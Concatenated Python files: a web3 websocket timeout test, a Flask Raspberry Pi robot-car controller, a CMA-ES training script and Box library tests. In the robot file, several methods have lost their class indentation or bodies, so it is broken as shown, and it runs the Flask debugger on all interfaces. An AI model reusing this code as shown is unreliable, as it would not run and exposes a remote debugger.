    Fix: ``pytest.yield_fixture`` is deprecated (removed in pytest 6.2);
    plain ``pytest.fixture`` has supported yield fixtures since pytest 3.0.
    """
    event_loop = asyncio.new_event_loop()

    def run_server():
        async def empty_server(websocket, path):
            data = await websocket.recv()
            await asyncio.sleep(0.02)
            await websocket.send(data)
        # NOTE(review): the 'loop' kwarg was removed in websockets>=10 —
        # confirm the pinned websockets version before upgrading.
        server = websockets.serve(empty_server, '127.0.0.1', open_port, loop=event_loop)
        event_loop.run_until_complete(server)
        event_loop.run_forever()

    thd = Thread(target=run_server)
    thd.start()
    try:
        yield
    finally:
        # Stop the loop from the fixture thread; thread-safe by design.
        event_loop.call_soon_threadsafe(event_loop.stop)
@pytest.fixture()
def w3(open_port, start_websocket_server):
    """Web3 instance wired to the echo server with a deliberately tiny timeout.

    The 0.01 s websocket_timeout is shorter than the server's 0.02 s delay,
    so every request through this provider times out by construction.
    """
    # need new event loop as the one used by server is already running
    event_loop = asyncio.new_event_loop()
    endpoint_uri = 'ws://127.0.0.1:{}'.format(open_port)
    event_loop.run_until_complete(wait_for_ws(endpoint_uri, event_loop))
    provider = WebsocketProvider(endpoint_uri, websocket_timeout=0.01)
    return Web3(provider)
def test_websocket_provider_timeout(w3):
    """The 0.01 s provider timeout must fire against the slow echo server."""
    with pytest.raises(TimeoutError):
        w3.platon.accounts
def test_restricted_websocket_kwargs():
    """Passing a restricted kwarg ('uri') to WebsocketProvider must raise."""
    invalid_kwargs = {'uri': 'ws://127.0.0.1:8546'}
    # NOTE(review): the trailing '*' quantifies the preceding character, not
    # '.*' — the pattern still matches via re.search, but looks unintended.
    re_exc_message = r'.*found: {0}*'.format(set(invalid_kwargs.keys()))
    with pytest.raises(ValidationError, match=re_exc_message):
        WebsocketProvider(websocket_kwargs=invalid_kwargs)
|
myrobot.py | #!/usr/bin/python
#-*- coding: utf-8 -*-
import os
from importlib import import_module
from flask import Flask, render_template, Response
from flask import render_template
from flask import request
from flask import abort, redirect, url_for
from flask import render_template
from flask import session, escape
from flask import g, flash
from flask import send_from_directory
from flask import jsonify
import json
from time import sleep
import io
from camera_pi import Camera
import logging
from threading import Condition
from camera_pi import Camera
import threading
# Physical (BOARD-numbered, see GPIO.setmode below) pin assignments.
HEADLIGHT = 3
L_LED = 29
R_LED = 31
B_MOTOR_A = 35
B_MOTOR_B = 37
F_MOTOR_A = 38
F_MOTOR_B = 40
def init_gpio():
    """Best-effort configuration of all robot GPIO pins as outputs.

    Errors are swallowed so the web app still starts on machines without
    RPi.GPIO hardware (the GPIO name may not even be defined there).
    """
    try:
        print("initialize gpio... ")
        GPIO.cleanup()
        GPIO.setmode( GPIO.BOARD )
        GPIO.setup( HEADLIGHT, GPIO.OUT )
        GPIO.setup( L_LED, GPIO.OUT )
        GPIO.setup( R_LED, GPIO.OUT )
        GPIO.setup( B_MOTOR_A, GPIO.OUT )
        GPIO.setup( B_MOTOR_B, GPIO.OUT )
        GPIO.setup( F_MOTOR_A, GPIO.OUT )
        GPIO.setup( F_MOTOR_B, GPIO.OUT )
    except Exception:
        # Narrowed from a bare 'except:' (which also swallowed
        # KeyboardInterrupt/SystemExit); stray duplicate 'pass' removed.
        pass
# RPi.GPIO only exists on a Raspberry Pi; degrade gracefully elsewhere
# (GPIO then stays undefined and hardware calls will fail individually).
try:
    import RPi.GPIO as GPIO
except:
    print("not found gpio library")
# NOTE(review): time/threading/datetime are re-imported here after the GPIO
# guard; harmless duplicates of the imports at the top of the file.
import time
import threading
from threading import Timer
import datetime
app = Flask( __name__ )
# Debug mode: auto-reload and in-browser tracebacks (not for production).
app.debug = True
app.config.from_object(__name__)
class Ubaba:
    def __init__(self):
        """Initialise drive/steering state and configure all GPIO PWM channels."""
        print('''
 --- UBABA Initialize... ---
        ''')
        self.duty = 0
        self.freq = 100
        self.acceleration = False  # currently accelerating?
        self.brake = False  # brake engaged
        self.gear = 0  # gear (drive direction): -1 reverse, 0 stop, 1..5 forward speeds
        self.acceleration_rate = 4  # duty added per work() tick while accelerating
        self.reduction_rate = 2  # duty removed per work() tick while coasting
        self.direction = 0  # steering direction: 0 center, 1 left, 2 right
        self.current_duty = 0  # current speed (PWM duty)
        self.target_duty = 0  # target duty: gear maximum while accelerating, 0 while coasting
        self.gear_duty = { -1:60, 0:0, 1:50, 2:60, 3:70, 4:80, 5:90 }  # top duty per gear
        self.F_MOTOR_A = 38
        self.F_MOTOR_B = 40
        self.B_MOTOR_A = 37
        self.B_MOTOR_B = 35
        self.F_LED = 3
        self.f_led_thread_running = False
        GPIO.cleanup()
        GPIO.setmode( GPIO.BOARD )
        GPIO.setup( self.F_MOTOR_A, GPIO.OUT )
        GPIO.setup( self.F_MOTOR_B, GPIO.OUT )
        GPIO.setup( self.F_LED, GPIO.OUT )
        GPIO.output( self.F_MOTOR_A, False )
        GPIO.output( self.F_MOTOR_B, False )
        GPIO.output( self.F_LED, True )
        GPIO.setup( self.B_MOTOR_A, GPIO.OUT )
        GPIO.setup( self.B_MOTOR_B, GPIO.OUT )
        GPIO.output( self.B_MOTOR_A, False )
        GPIO.output( self.B_MOTOR_B, False )
        # PWM channels: drive forward/backward and steering left/right.
        self.pwm_F = GPIO.PWM( self.F_MOTOR_B, 10)
        self.pwm_B = GPIO.PWM( self.F_MOTOR_A, 10)
        self.pwm_L = GPIO.PWM(self.B_MOTOR_A, 60)
        self.pwm_R = GPIO.PWM(self.B_MOTOR_B, 60)
        self.pwm_F_LED = GPIO.PWM( self.F_LED, 100)
        print(" init Ubaba class ")
        self.enable_work_thread = False
        self.is_running_work_thread = False
    def start_work(self):
        """Start the drive loop thread (work) unless it is already running."""
        print("start_work")
        if self.is_running_work_thread == True:
            print("work_thread already running. return ")
            return
        self.enable_work_thread = True
        self.work_thread = threading.Thread( target = self.work, args=(1,))
        # Daemon so a stuck drive loop cannot block process exit.
        self.work_thread.daemon = True
        self.work_thread.start()
def stop_work(self):
print("stop_work")
self.enable_work_thread = False
    def work(self, arg1):
        """Drive loop: every 0.5 s ramp current_duty toward the gear target
        and apply it to the forward/backward PWM channels.

        Runs until enable_work_thread is cleared (see stop_work).
        """
        print("주행쓰레드시작")
        self.is_running_work_thread = True
        count = 0
        self.pwm_F.start(0)
        self.pwm_B.start(0)
        while self.enable_work_thread == True:
            sleep(0.5)
            count = count +1
            # Movement according to gear state:
            # pick the target duty for the current gear, then
            # ramp the current duty toward it depending on the acceleration flag.
            self.target_duty = self.gear_duty[ self.gear ]
            # print("current duty:{} target_duty:{} acceleration_rate:{}".format( self.current_duty, self.target_duty, self.acceleration_rate ));
            # Current duty below target:
            if self.current_duty < self.target_duty:
                if self.acceleration == True:
                    # accelerating: ramp up by the acceleration rate
                    self.current_duty = self.current_duty + self.acceleration_rate
                else:
                    # not accelerating: coast down
                    if self.current_duty > 0:
                        self.current_duty = self.current_duty - self.reduction_rate
            else:
                # Current duty above target: decelerate toward it.
                self.current_duty = self.current_duty - self.reduction_rate
            # Brake: cut the duty immediately.
            if self.brake == True:
                self.current_duty = 0
            if self.current_duty < 0:
                self.current_duty = 0
            if self.gear != -1:
                # apply the current duty to the forward PWM channel
                self.pwm_F.start(0)
                self.pwm_B.stop()
                self.pwm_F.ChangeDutyCycle( self.current_duty )
                self.pwm_B.ChangeDutyCycle( 0 )
                GPIO.output( self.F_MOTOR_A, False )
            elif self.gear == -1:
                # reverse: drive the backward PWM channel instead
                self.pwm_F.stop()
                self.pwm_B.start(0)
                self.pwm_F.ChangeDutyCycle( 90 )
                self.pwm_B.ChangeDutyCycle( self.current_duty )
                GPIO.output( self.F_MOTOR_B, False )
        print("주행쓰레드종료")
        self.is_running_work_thread = False
def f_led(self, onoff, level = 1):
    """Switch the front LED.

    :param onoff: True -> enable PWM at duty ``20 * level``;
                  False -> set duty 100, stop PWM and re-drive the pin high.
    :param level: brightness multiplier (duty = 20 * level).

    NOTE(review): the off-path leaves the pin driven high, which suggests the
    LED is wired active-low (lower duty = brighter) — confirm against wiring.
    """
    print(" F_LED onoff:{} level:{}".format(onoff, level))
    if onoff == True:
        self.pwm_F_LED.start(0)
        self.pwm_F_LED.ChangeDutyCycle(20 * level)
    else:
        self.pwm_F_LED.ChangeDutyCycle(100)
        self.pwm_F_LED.stop()
        sleep(0.1)
        # Re-claim the pin as a plain output after PWM and drive it high.
        GPIO.setup( self.F_LED, GPIO.OUT )
        GPIO.output( self.F_LED, True )
def start_f_led_blink(self):
if self.f_led_thread_running == True:
print("이미 쓰레드가 실행중입니다.")
return
self.f_led_thread = threading.Thread( target = self.f_led_work, args=(1, 2))
self.f_led_thread.daemon = True
self.f_led_thread.start()
def f_led_work( self, arg1, arg2 ):
    """Front-LED "breathing" animation thread body.

    Runs 10 fade cycles (duty swept 100->0 then 0->100 in steps of 5, 10 ms
    per step), then stops PWM and restores the pin high.  ``arg1``/``arg2``
    are unused thread-start placeholders.
    """
    print(" f_led_work ")
    self.f_led_thread_running = True
    self.pwm_F_LED.start(0)
    for k in range(0,10):
        # fade one way...
        for i in range(0, 100, 5):
            self.pwm_F_LED.ChangeDutyCycle(100-i)
            sleep(0.01)
        # ...then back.
        for i in range(0, 100, 5):
            self.pwm_F_LED.ChangeDutyCycle(i)
            sleep(0.01)
    self.pwm_F_LED.ChangeDutyCycle(100)
    self.pwm_F_LED.stop()
    sleep(0.1)
    # Re-claim the pin as a plain output and leave the LED line high.
    GPIO.setup( self.F_LED, GPIO.OUT )
    GPIO.output( self.F_LED, True )
    self.f_led_thread_running = False
    print(" f_led_work ended ")
def motor_forward(self, duty= 40):
    """Drive the traction motor "forward" at the given PWM duty cycle.

    NOTE(review): despite the name this drives pwm_B / F_MOTOR_B, and the
    /motor route maps 'forward' to motor_backward — presumably compensating
    for swapped wiring; confirm against the hardware.
    """
    print("motor forward")
    GPIO.output( self.F_MOTOR_B, False )
    self.pwm_B.start(duty)
    self.pwm_B.ChangeDutyCycle(duty)
    pass
def motor_backward(self, duty = 30):
    """Drive the traction motor "backward" at the given PWM duty cycle.

    NOTE(review): drives pwm_F / F_MOTOR_A — mirror of motor_forward's
    apparent naming/wiring swap; confirm against the hardware.
    """
    print("motor backward")
    GPIO.output( self.F_MOTOR_A, False )
    self.pwm_F.start(duty)
    self.pwm_F.ChangeDutyCycle(duty)
    pass
def motor_stop(self):
    """Stop the traction motor: both direction pins low, both PWMs stopped."""
    print("motor stop")
    GPIO.output( self.F_MOTOR_A, False )
    GPIO.output( self.F_MOTOR_B, False )
    self.pwm_F.stop()
    self.pwm_B.stop()
    pass
def turn_left(self, duty = 100):
    """Steer left by energizing one side of the steering motor.

    NOTE(review): pulls B_MOTOR_A low and drives pwm_R (which __init__ binds
    to B_MOTOR_B) — presumably matches the H-bridge wiring; confirm.
    """
    GPIO.output( self.B_MOTOR_A, False )
    self.pwm_R.start(duty)
    self.pwm_R.ChangeDutyCycle(duty)
    pass
def turn_right(self, duty = 100):
    """Steer right by energizing the other side of the steering motor.

    NOTE(review): pulls B_MOTOR_B low and drives pwm_L (bound to B_MOTOR_A
    in __init__) — mirror of turn_left; confirm wiring.
    """
    GPIO.output( self.B_MOTOR_B, False )
    self.pwm_L.start(duty)
    self.pwm_L.ChangeDutyCycle(duty)
    pass
def turn_center(self):
    """Release the steering motor (both pins low, both PWMs stopped)."""
    GPIO.output( self.B_MOTOR_A, False )
    GPIO.output( self.B_MOTOR_B, False )
    self.pwm_L.stop()
    self.pwm_R.stop()
    pass
def warming_up(self):
    """Hardware self-test: briefly pulse drive forward/backward and sweep
    the steering left/right, ending with everything stopped and centered.
    Takes about one second of wall time (sleeps between steps)."""
    self.motor_stop()
    sleep(0.1)
    self.motor_forward()
    sleep(0.2)
    self.motor_backward()
    sleep(0.2)
    self.motor_stop()
    sleep(0.1)
    self.turn_left()
    sleep(0.1)
    self.turn_center()
    sleep(0.1)
    self.turn_right()
    sleep(0.1)
    self.turn_center()
    return
# Module-level singleton used by all Flask routes below.  Note this runs the
# hardware self-test (motor pulses) as a side effect of importing the module.
ubaba = Ubaba()
ubaba.motor_stop()
ubaba.warming_up()
@app.route('/work_thread_enable', methods=['POST'])
def work_therad_enable():
    """Start or stop the drive-control thread.

    POST form field 'enable': 'true' starts the thread, anything else stops it.
    NOTE(review): the function name misspells 'thread'; kept as-is because the
    URL rule, not the Python name, defines the endpoint.
    """
    enable = request.form['enable']
    print(" enable : {}".format(enable))
    if enable == 'true':
        ubaba.start_work()
    else:
        ubaba.stop_work()
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/get_status', methods=['POST'])
def get_status():
    """Return a JSON snapshot of the current drive state (thread flag, gear,
    acceleration/brake flags, ramp rates, current and target duty)."""
    data = {
        'is_running_work_thread': ubaba.is_running_work_thread,
        'acceleration': ubaba.acceleration,
        'brake': ubaba.brake,
        'gear': ubaba.gear,
        'acceleration_rate': ubaba.acceleration_rate,
        'reduction_rate': ubaba.reduction_rate,
        'direction': ubaba.direction,
        'current_duty': ubaba.current_duty,
        'target_duty': ubaba.target_duty }
    return jsonify(data)
@app.route('/gear', methods=['POST'])
def gear():
    """Select a gear.  Form field 'gear_value' is an int; -1 means reverse
    (see the work loop), other values index into ubaba.gear_duty."""
    gear_val = int(request.form['gear_value'])
    ubaba.gear = gear_val
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/acceleration', methods=['POST'])
def acceleration():
    """Set the accelerator flag from form field 'onoff' ('true'/'false')."""
    ubaba.acceleration = (request.form['onoff'] == 'true')
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/brake', methods=['POST'])
def brake():
    """Set the brake flag from form field 'onoff' ('true'/'false')."""
    ubaba.brake = (request.form['onoff'] == 'true')
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/headlight', methods=['POST'])
def headlight():
    """Toggle the front LED.

    NOTE(review): the LED is turned ON when form field 'turnon' equals '0',
    which looks inverted — verify against the client's contract.
    """
    onoff = request.form['turnon']
    ubaba.f_led(onoff == '0')
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/blink_led', methods=['POST'])
def blink_led():
    """Start the front-LED blink animation.

    NOTE(review): 'interval' and 'count' are parsed but never used —
    f_led_work hard-codes its timing and cycle count.
    """
    interval = float(request.form['interval'])
    count = int(request.form['count'])
    ubaba.start_f_led_blink()
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/motor', methods=['POST'])
def motor():
    """Direct drive/steer command.

    Form fields: 'run' in {'forward','backward','stop'} and
    'turn' in {'left','right','center'}.  Turns are pulsed for 0.5 s and
    then re-centered, blocking the request for that long.

    NOTE(review): 'forward' invokes motor_backward and vice versa —
    presumably compensating for the swapped motor wiring (see the motor_*
    methods); confirm on hardware.
    """
    # Re-assert the pin numbering mode on every request.
    GPIO.setmode(GPIO.BOARD)
    run = request.form['run']
    turn = request.form['turn']
    if run == 'forward':
        ubaba.motor_backward(60)
    elif run == 'backward':
        ubaba.motor_forward(60)
    elif run == 'stop':
        ubaba.motor_stop()
    if turn == 'left':
        ubaba.turn_left()
        sleep(0.5)
        ubaba.turn_center()
    elif turn == 'right':
        ubaba.turn_right()
        sleep(0.5)
        ubaba.turn_center()
    elif turn == 'center':
        ubaba.turn_center()
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/run', methods=['POST'])
def run():
    """Run the drive motor at an explicit duty cycle (form field 'duty').

    NOTE(review): calls motor_forward directly, whereas /motor maps
    'forward' to motor_backward — the two endpoints drive opposite
    directions for the same word; confirm which is intended.
    """
    duty = float(request.form['duty'])
    print("run. duty:", duty )
    ubaba.motor_forward(duty)
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/stop', methods=['POST'])
def stop():
    """Stop the drive motor."""
    ubaba.motor_stop()
    return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/view_stream')
def view_stream():
    """Serve the camera-stream viewer page (embeds /video_feed)."""
    return render_template('view_stream.html')
def gen(camera):
    """Yield an endless multipart/x-mixed-replace JPEG stream.

    :param camera: any object exposing ``get_frame() -> bytes``.
    """
    print("hasiho init!!!!!!")
    while True:
        payload = camera.get_frame()
        yield b'--frame\r\nContent-Type: image/jpeg\r\n\r\n' + payload + b'\r\n'
@app.route('/video_feed')
def video_feed():
    """Stream camera frames as an MJPEG multipart response."""
    ret = Response(gen(Camera()), mimetype='multipart/x-mixed-replace; boundary=frame')
    print(ret)
    return ret
@app.route('/')
def index_page():
    """Serve the main control page, re-initializing the motor pins.

    NOTE(review): `pwm` is a local; with RPi.GPIO the PWM object can be
    garbage-collected when this handler returns, stopping the output —
    confirm whether the start(30) pulse here is intentional.
    """
    # init_gpio()
    GPIO.setmode(GPIO.BOARD)
    GPIO.setup( F_MOTOR_B, GPIO.OUT )
    GPIO.output( F_MOTOR_B, False )
    GPIO.setup( F_MOTOR_A, GPIO.OUT )
    pwm = GPIO.PWM( F_MOTOR_A, 30 )
    pwm.start( 30 )
    return render_template('index.html')
if __name__ == '__main__':
    # NOTE(review): debug=True on 0.0.0.0 exposes the Werkzeug debugger to
    # the whole network; the reloader also re-imports the module, re-running
    # the warming_up() hardware pulse.  Acceptable for a hobby robot on a
    # trusted LAN only.
    app.run(use_reloader=True, debug=True, host='0.0.0.0')
|
train_ctrl_exp.py | """
Trains controller and the explorer, based on --explorer.
Calls the RolloutGenerator, which generates rollouts and the associated rewards for either controller or explorer.
Controller returns the sum of discounted rewards; explorer returns the sum of undiscounted model reconstruction error (see utils.misc).
Trains a linear controller and explorer on latent + recurrent state with CMA-ES.
This is a bit complex. num_workers slave threads are launched
to process a queue filled with parameters to be evaluated.
Needs to be run using xvfb-run -s "-screen 0 1400x900x24"
"""
import argparse
import sys
import pickle
from os.path import join, exists, isfile
from os import mkdir, unlink, listdir, getpid
from time import sleep
from torch.multiprocessing import Process, Queue
import torch
import cma
from models import Controller
from tqdm import tqdm
import numpy as np
# from utils.misc import RolloutGenerator, ASIZE, RSIZE, LSIZE
# from utils.misc import load_parameters
# from utils.misc import flatten_parameters
from utils.explore_misc import RolloutGenerator, ASIZE, RSIZE, LSIZE
from utils.explore_misc import load_parameters
from utils.explore_misc import flatten_parameters
# --- command-line parsing ---
parser = argparse.ArgumentParser()
parser.add_argument('--logdir', type=str, help='Where everything is stored.')
parser.add_argument('--n-samples', type=int, help='Number of samples used to obtain return estimate.',
                    default=4)
parser.add_argument('--pop-size', type=int, help='Population size.',
                    default=4)
parser.add_argument('--target-return', type=float, help='Stops once the return '
                    'gets above target_return', default=None)
parser.add_argument('--display', action='store_true', help="Use progress bars if "
                    "specified.")
parser.add_argument('--max-workers', type=int, help='Maximum number of workers.',
                    default=10)
parser.add_argument('--iteration', type=int, help='counter to keep track of where results are saved',
                    default=0)
parser.add_argument('--explore', action='store_true', help="If specified, use Reconstruction error and store models in exp.")
parser.add_argument('--max-epochs', type=int, help='Max epochs to train. Used instead of target-return to train explorer',
                    default=None)
args = parser.parse_args()
iteration = str(args.iteration)
# --- multiprocessing variables ---
n_samples = args.n_samples
pop_size = args.pop_size
# Never spawn more workers than there are rollouts per generation.
num_workers = min(args.max_workers, n_samples * pop_size)
time_limit = 1000  # max environment steps per rollout
# Controller checkpoints go to <logdir>/ctrl, explorer checkpoints to <logdir>/exp.
folder_name = 'ctrl'
if args.explore:
    folder_name = 'exp'
print('ctrl folder_name: ', folder_name)
# tmp dir is wiped on every run; it held per-worker stdout/stderr dumps when
# the redirects in slave_routine were enabled (currently commented out there).
# create tmp dir if non-existent and clean it if existent
tmp_dir = join(args.logdir, 'tmp')
if not exists(tmp_dir):
    mkdir(tmp_dir)
else:
    for fname in listdir(tmp_dir):
        unlink(join(tmp_dir, fname))
# create ctrl dir if non-existent. Either 'ctrl' or 'exp'.
ctrl_dir = join(args.logdir, folder_name)
if not exists(ctrl_dir):
    mkdir(ctrl_dir)
# Per-run performance log: created fresh or appended to across invocations.
results_loc = args.logdir +'/controller_perf_target_'+str(folder_name)+'.pkl'
if not isfile(results_loc):
    print(f'Iteration {iteration}, making new results file')
    results={}
    results['epoch'] = []
    results['best'] = []
    results['best_params'] = []
    results['std_best'] = []
else:
    print(f'Iteration {iteration}, loading results')
    results = pickle.load( open( results_loc, "rb" ) )
################################################################################
# Thread routines #
################################################################################
def slave_routine(p_queue, r_queue, e_queue, p_index):
    """ Thread routine.
    Threads interact with p_queue, the parameters queue, r_queue, the result
    queue and e_queue the end queue. They pull parameters from p_queue, execute
    the corresponding rollout, then place the result in r_queue.
    Each parameter has its own unique id. Parameters are pulled as tuples
    (s_id, params) and results are pushed as (s_id, result). The same
    parameter can appear multiple times in p_queue, displaying the same id
    each time.
    As soon as e_queue is non empty, the thread terminate.
    When multiple gpus are involved, the assigned gpu is determined by the
    process index p_index (gpu = p_index % n_gpus).
    :args p_queue: queue containing couples (s_id, parameters) to evaluate
    :args r_queue: where to place results (s_id, results)
    :args e_queue: as soon as not empty, terminate
    :args p_index: the process index
    """
    # init routine
    # NOTE(review): `gpu` is computed but unused — the device is hard-coded
    # to cuda:0 below, so all workers share one GPU.  Also raises
    # ZeroDivisionError on CPU-only hosts (device_count() == 0).
    gpu = p_index % torch.cuda.device_count()
    device = device="cuda:0" #torch.device('cuda:{}'.format(gpu) if torch.cuda.is_available() else 'cpu')
    # redirect streams
    # sys.stdout = open(join(tmp_dir, str(getpid()) + '.out'), 'a')
    # sys.stderr = open(join(tmp_dir, str(getpid()) + '.err'), 'a')
    with torch.no_grad():
        r_gen = RolloutGenerator(args.logdir, device, time_limit, args.explore)
        # Busy-poll the parameter queue (100 ms granularity) until the
        # master posts the 'EOP' sentinel on e_queue.
        while e_queue.empty():
            if p_queue.empty():
                sleep(.1)
            else:
                s_id, params = p_queue.get()
                r_queue.put((s_id, r_gen.rollout(params)))
################################################################################
# Define queues and start workers #
################################################################################
# Shared queues: parameters in, results out, and a shutdown sentinel channel.
p_queue = Queue()
r_queue = Queue()
e_queue = Queue()
# Workers are plain (non-daemon) processes; they exit only when 'EOP' is
# posted on e_queue at the end of the script.
for p_index in range(num_workers):
    Process(target=slave_routine, args=(p_queue, r_queue, e_queue, p_index)).start()
################################################################################
# Evaluation #
################################################################################
def evaluate(solutions, results, rollouts=100):
    """ Give current controller evaluation.
    Evaluation is minus the cumulated reward averaged over rollout runs.
    :args solutions: CMA set of solutions
    :args results: corresponding results
    :args rollouts: number of rollouts
    :returns: (best_guess, minus averaged cumulated reward, std of estimates)
    """
    # Pick the candidate with the lowest (best, since rewards are negated)
    # result and re-evaluate it `rollouts` times through the worker pool.
    index_min = np.argmin(results)
    best_guess = solutions[index_min]
    restimates = []
    for s_id in range(rollouts):
        p_queue.put((s_id, best_guess))
    print("Evaluating...")
    # NOTE(review): results are consumed in arrival order and the s_id is
    # discarded — any stale result left on r_queue from a previous phase
    # would silently be mixed in.  Busy-polls at 100 ms granularity.
    for _ in tqdm(range(rollouts)):
        while r_queue.empty():
            sleep(.1)
        restimates.append(r_queue.get()[1])
    return best_guess, np.mean(restimates), np.std(restimates)
################################################################################
# Launch CMA #
################################################################################
# Dummy controller instance used only to shape/flatten the parameter vector.
controller = Controller(LSIZE, RSIZE, ASIZE)  # dummy instance
# define current best and load parameters.
# Convention: rewards are negated throughout (CMA-ES minimizes), so
# cur_best stores MINUS the best reward seen so far.
cur_best = None
ctrl_file = join(ctrl_dir, 'best.tar')
print("Attempting to load previous best...")
if exists(ctrl_file):
    state = torch.load(ctrl_file, map_location={'cuda:0': 'cpu'})
    cur_best = - state['reward']
    controller.load_state_dict(state['state_dict'])
    print("Previous best was {}...".format(-cur_best))
parameters = controller.parameters()
es = cma.CMAEvolutionStrategy(flatten_parameters(parameters), 0.1,
                              {'popsize': pop_size})
epoch = 0
log_step = 3  # evaluate / checkpoint every log_step epochs
while not es.stop():
    print('Starting epoch: ', epoch)
    if args.target_return:
        if cur_best is not None and - cur_best > args.target_return:
            print("Already better than target, breaking...")
            break
    r_list = [0] * pop_size  # result list, one averaged return per candidate
    solutions = es.ask()
    # push each candidate n_samples times so returns are averaged.
    for s_id, s in enumerate(solutions):
        for _ in range(n_samples):
            p_queue.put((s_id, s))
    # retrieve results (busy-poll; accumulate by candidate id)
    if args.display:
        pbar = tqdm(total=pop_size * n_samples)
    for _ in range(pop_size * n_samples):
        while r_queue.empty():
            sleep(.1)
        r_s_id, r = r_queue.get()
        r_list[r_s_id] += r / n_samples
        if args.display:
            pbar.update(1)
    if args.display:
        pbar.close()
    es.tell(solutions, r_list)
    es.disp()
    # evaluation and saving (every log_step epochs)
    if epoch % log_step == log_step - 1:
        best_params, best, std_best = evaluate(solutions, r_list)
        # log the evaluation of the current best candidate
        results['epoch'].extend([epoch])
        results['best'].extend([best])
        results['best_params'].extend([best_params])
        results['std_best'].extend([std_best])
        print(f"Epoch: {epoch}, Current evaluation best: {best}, std_best: {std_best}")
        # NOTE(review): `not cur_best` also triggers when cur_best == 0.0,
        # i.e. a legitimate score of exactly zero is treated like "no best
        # yet" — confirm whether that edge case matters here.
        if not cur_best or cur_best > best:
            cur_best = best
            print("Saving new best with value {}+-{}...".format(-cur_best, std_best))
            load_parameters(best_params, controller)
            torch.save(
                {'epoch': epoch,
                 'reward': - cur_best,
                 'state_dict': controller.state_dict()},
                join(ctrl_dir, 'best.tar'))
        # if args.max_epochs specified, stop based on it; otherwise on
        # target return (remember `best` is a negated reward).
        if args.max_epochs:
            if epoch > int(args.max_epochs):
                print('MAX EPOCHS REACHED')
                break
        elif args.target_return:
            if - best > args.target_return:
                print('HIT TARGET RETURN')
                print("Terminating controller training with value {}...".format(best))
                break
    epoch += 1
    # Persist the (possibly updated) results log every epoch.
    with open(results_loc, 'wb') as outfile:
        pickle.dump(results, outfile, protocol=pickle.HIGHEST_PROTOCOL)
es.result_pretty()
# Tell every worker process to shut down.
e_queue.put('EOP')
|
test_functional_box.py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Test files gathered from json.org and yaml.org
from __future__ import absolute_import
from multiprocessing import Process, Queue
import pytest
import pickle
try:
from test.common import *
except ImportError:
from .common import *
class TestBoxFunctional(unittest.TestCase):
    # Functional tests for the Box library (Box, BoxList, ConfigBox, SBox).
    @pytest.fixture(autouse=True)
    def temp_dir_cleanup(self):
        """Recreate a clean tmp_dir before each test, remove it afterwards."""
        shutil.rmtree(tmp_dir, ignore_errors=True)
        try:
            os.makedirs(tmp_dir)
        except OSError:
            pass
        yield
        shutil.rmtree(tmp_dir, ignore_errors=True)
    def test_box(self):
        """Attribute/key access, set/delattr, repr, tuple keys, conversion_box=False."""
        bx = Box(**test_dict)
        assert bx.key1 == test_dict['key1']
        assert dict(getattr(bx, 'Key 2')) == test_dict['Key 2']
        setattr(bx, 'TEST_KEY', 'VALUE')
        assert bx.TEST_KEY == 'VALUE'
        delattr(bx, 'TEST_KEY')
        assert 'TEST_KEY' not in bx.to_dict(), bx.to_dict()
        assert isinstance(bx['Key 2'].Key4, Box)
        assert "'key1': 'value1'" in str(bx)
        assert repr(bx).startswith("<Box:")
        bx2 = Box([((3, 4), "A"), ("_box_config", 'test')])
        assert bx2[(3, 4)] == "A"
        assert bx2['_box_config'] == 'test'
        bx3 = Box(a=4, conversion_box=False)
        setattr(bx3, 'key', 2)
        assert bx3.key == 2
        bx3.__setattr__("Test", 3)
        assert bx3.Test == 3
    def test_box_modify_at_depth(self):
        """Mutations on nested Boxes propagate to to_dict()."""
        bx = Box(**test_dict)
        assert 'key1' in bx
        assert 'key2' not in bx
        bx['Key 2'].new_thing = "test"
        assert bx['Key 2'].new_thing == "test"
        bx['Key 2'].new_thing += "2"
        assert bx['Key 2'].new_thing == "test2"
        assert bx['Key 2'].to_dict()['new_thing'] == "test2"
        assert bx.to_dict()['Key 2']['new_thing'] == "test2"
        bx.__setattr__('key1', 1)
        assert bx['key1'] == 1
        bx.__delattr__('key1')
        assert 'key1' not in bx
    def test_error_box(self):
        """Missing attribute raises AttributeError."""
        bx = Box(**test_dict)
        with pytest.raises(AttributeError):
            getattr(bx, 'hello')
    def test_box_from_dict(self):
        """Nested dicts become nested Boxes."""
        ns = Box({"k1": "v1", "k2": {"k3": "v2"}})
        assert ns.k2.k3 == "v2"
    def test_box_from_bad_dict(self):
        """A string (even JSON-looking) is rejected with ValueError."""
        with pytest.raises(ValueError):
            Box('{"k1": "v1", "k2": {"k3": "v2"}}')
    def test_basic_box(self):
        """All constructor forms (kwargs, dict, zip, pairs) are equivalent."""
        a = Box(one=1, two=2, three=3)
        b = Box({'one': 1, 'two': 2, 'three': 3})
        c = Box((zip(['one', 'two', 'three'], [1, 2, 3])))
        d = Box(([('two', 2), ('one', 1), ('three', 3)]))
        e = Box(({'three': 3, 'one': 1, 'two': 2}))
        assert a == b == c == d == e
    def test_config_box(self):
        """ConfigBox typed getters: list/bool/int/float and get* fallbacks."""
        g = {"b0": 'no',
             "b1": 'yes',
             "b2": 'True',
             "b3": 'false',
             "b4": True,
             "i0": '34',
             "f0": '5.5',
             "f1": '3.333',
             "l0": '4,5,6,7,8',
             "l1": '[2 3 4 5 6]'}
        cns = ConfigBox(bb=g)
        assert cns.bb.list("l1", spliter=" ") == ["2", "3", "4", "5", "6"]
        assert cns.bb.list("l0", mod=lambda x: int(x)) == [4, 5, 6, 7, 8]
        assert not cns.bb.bool("b0")
        assert cns.bb.bool("b1")
        assert cns.bb.bool("b2")
        assert not cns.bb.bool("b3")
        assert cns.bb.int("i0") == 34
        assert cns.bb.float("f0") == 5.5
        assert cns.bb.float("f1") == 3.333
        assert cns.bb.getboolean("b4"), cns.bb.getboolean("b4")
        assert cns.bb.getfloat("f0") == 5.5
        assert cns.bb.getint("i0") == 34
        assert cns.bb.getint("Hello!", 5) == 5
